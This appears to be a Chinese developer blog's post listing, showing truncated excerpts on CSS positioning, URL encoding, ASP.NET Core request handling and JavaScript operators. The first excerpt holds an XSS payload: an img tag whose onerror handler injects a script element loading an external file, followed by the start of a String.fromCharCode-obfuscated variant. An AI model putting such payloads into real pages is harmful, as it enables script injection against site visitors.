摘要:
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="domain.js"></img> <img src="#" onerror="var a=String.fromChar 阅读全文
摘要:
转自: https://blog.csdn.net/qq_40717869/article/details/81749970 1.用fixed定位来解决 解决思路:这个就是把html,body设置width: 100%; height: 100%; position: fixed;top:0;lef 阅读全文
摘要:
encodeURIComponent('\n') "%0A" encodeURIComponent('\\') "%5C" encodeURIComponent('/') "%2F" encodeURIComponent(',') "%2C" encodeURIComponent('\'') %27 阅读全文
摘要:
ICollection<string> keys = Request.Form.Keys; foreach (string key in Request.Form.Keys) { } var key_list = Request.Form.Keys.ToList(); for (int i = 0; 阅读全文
摘要:
using Microsoft.AspNetCore.Mvc; using Microsoft.AspNetCore.Mvc.Filters; namespace Manage.Api { /// <summary> /// 若Action返回对象为自定义对象,则将其转为JSON /// </sum 阅读全文
摘要:
var slist = document.getElementsByTagName('select'); for(i=0;i<slist.length;i++) { var t = slist[i].childNodes; for(j=0;j<t.length;j++){ debugger; var 阅读全文
摘要:
js 优先级 && == 6 … ? … : … == 4 //0 && 0 ? 0 : 0; //0 && 1 ? console.log(1):console.log(2); //输出 2 //1 && 1 ? console.log(1):console.log(2); //输出 1 //0 阅读全文
摘要:
function systc() { var t = layer.confirm('确认要退出系统吗?', { btn: ['确定', '取消'] //按钮 }, function () { $("#btnDel").click(); }, function () { }); document.ge 阅读全文
摘要:
https://www.runoob.com/w3cnote/js-call-apply-bind.html 阅读全文
摘要:
var z1= void 0; var z2 = void 1; var z212 = void (1&&1); var z213 = void (1&&0); z1 = 未定义 function fun2() { /* // 1 && 1 返回1 // 0 && 1 返回0 // 1 && 0 返 阅读全文